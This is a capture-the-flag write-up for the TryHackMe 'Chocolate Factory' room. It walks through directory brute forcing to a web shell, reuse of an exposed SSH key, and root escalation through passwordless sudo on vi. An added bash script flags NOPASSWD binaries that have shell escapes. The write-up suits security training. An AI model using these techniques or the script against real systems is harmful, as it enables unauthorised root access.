https://tryhackme.com/room/chocolatefactory

  • Directory brute forcing exposes a page intended only to be found after authentication. This page is a web shell and allows arbitrary remote code execution.
  • A private SSH key was found and allowed a remote SSH connection to be made.
  • Poor sudo configuration allows the low-privilege user to run /bin/vi as root without a password.
  • Vi can spawn a shell; since it was run with sudo, the spawned shell runs in the context of the root user.
  • Instead of a root.txt flag, there is a root.py script with an encrypted flag. The decryption key can be found in the web server's document root.

Here, dirsearch.py uses the default dicc.txt wordlist.  

/home.php is a webshell that allows remote code execution.

  • I tried a bash reverse shell and uploading an msfvenom-created reverse shell, but neither worked.

/validate.php exposes user credentials, although they are useless and contribute nothing.

The private key can be saved to the attacker machine and used for the remote SSH connection with ssh -i <private key> <user>@<target>. The saved key file must not be readable by other users (chmod 600), otherwise ssh refuses to use it.

The user flag is in the home folder

Sudo misconfiguration allows the low privilege user to run /bin/vi as root without password.

Can escape vi and spawn a shell as root, e.g. with :!/bin/sh from inside vi (https://gtfobins.github.io/gtfobins/vi/#sudo)
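The sudo check and the vi escape above can be scripted as a quick triage step: parse the output of sudo -l for NOPASSWD entries and flag any binary with a known GTFOBins shell escape. This is an added example, not part of the original writeup; the sudo -l output below is constructed for the example (the username and the second entry are invented), and the ESCAPABLE list is a hand-picked subset, not the full GTFOBins catalogue.

```bash
#!/usr/bin/env bash
# Added example: triage "sudo -l" output for NOPASSWD binaries with a
# documented sudo shell escape on GTFOBins. Not code from the room or writeup.

# Constructed sample of "sudo -l" output (username and second entry invented).
SAMPLE_SUDO_L='Matching Defaults entries for lowpriv on localhost:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User lowpriv may run the following commands on localhost:
    (ALL : ALL) NOPASSWD: /bin/vi
    (root) /usr/bin/systemctl status sshd'

# Constructed sample with no NOPASSWD entries at all.
SAMPLE_SAFE='User lowpriv may run the following commands on localhost:
    (root) /usr/bin/systemctl status sshd'

# Illustrative subset of binaries with a sudo shell escape on GTFOBins
# (assumption: hand-picked, not exhaustive).
ESCAPABLE="vi vim nano less more man find awk python python3 perl env bash sh"

# Read "sudo -l" output on stdin and print each NOPASSWD binary, one per line.
# Handles lines such as "(ALL : ALL) NOPASSWD: /usr/bin/find, /usr/bin/less".
nopasswd_bins() {
    grep 'NOPASSWD:' \
        | sed 's/.*NOPASSWD: *//' \
        | tr ',' '\n' \
        | sed 's/^ *//; s/ .*//'
}

# Print only the NOPASSWD binaries whose basename is in ESCAPABLE.
escapable_nopasswd() {
    nopasswd_bins | while read -r bin; do
        name=$(basename "$bin")
        case " $ESCAPABLE " in
            *" $name "*) echo "$bin" ;;
        esac
    done
}

# For vi/vim, print the GTFOBins one-liner that spawns a root shell directly.
escape_hint() {
    case "$(basename "$1")" in
        vi|vim) echo "sudo $1 -c ':!/bin/sh' /dev/null" ;;
        *)      echo "see https://gtfobins.github.io/gtfobins/$(basename "$1")/#sudo" ;;
    esac
}

# Run the triage over the constructed sample when executed directly.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    printf '%s\n' "$SAMPLE_SUDO_L" | escapable_nopasswd | while read -r bin; do
        echo "NOPASSWD shell escape candidate: $bin"
        echo "  hint: $(escape_hint "$bin")"
    done
fi
```

On a real target, replace the embedded sample with `sudo -l | escapable_nopasswd`; the parsing assumes the standard sudo -l layout where each rule line contains the literal token NOPASSWD:.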


Root user has access to /root/root.py which asks for a key.

The key is found in /var/www/html/key_rev_key

Once the key is entered, the flag is revealed.
